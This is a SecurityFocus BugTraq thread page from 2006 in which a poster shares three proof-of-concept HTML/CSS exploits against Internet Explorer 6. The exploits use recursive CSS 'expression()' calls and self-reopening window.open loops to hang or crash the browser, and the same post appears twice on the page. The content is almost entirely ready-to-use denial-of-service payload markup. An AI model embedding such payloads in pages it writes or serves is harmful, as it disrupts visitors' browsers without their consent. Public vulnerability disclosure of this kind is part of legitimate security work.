BugTraq
Back to list
|
Post reply
Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Dec 06 2006 07:01AM
José Carlos Nieto Jarquín (xiam core gmail com)
(1 replies)
Note:
I'm sorry, two of the the exploits in the prior e-mail were incomplete.
This is just another couple of proof of concept exploits for this
well-known browser. The third one is a lame combination of both.
Tested under Windows XP SP2, MSIE 6.0.2900.2180
Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
Exploit 2
<div style="width: expression(window.open(self.location));">
</div>
Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+document.getElementById(
'foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder :(. It sucks, don't use it :).
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be
[ reply ]
Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Dec 07 2006 05:00PM
Andrius Paurys (andrius paurys gmail com)
(1 replies)
Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Dec 08 2006 05:46PM
chinese soup (noodle mastah gmail com)
(1 replies)
Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Dec 09 2006 09:21PM
chinese soup (noodle mastah gmail com)
Privacy Statement
Copyright 2010, SecurityFocus
I'm sorry, two of the the exploits in the prior e-mail were incomplete.
This is just another couple of proof of concept exploits for this
well-known browser. The third one is a lame combination of both.
Tested under Windows XP SP2, MSIE 6.0.2900.2180
Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
Exploit 2
<div style="width: expression(window.open(self.location));">
</div>
Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+document.getElementById(
'foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder :(. It sucks, don't use it :).
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be
[ reply ]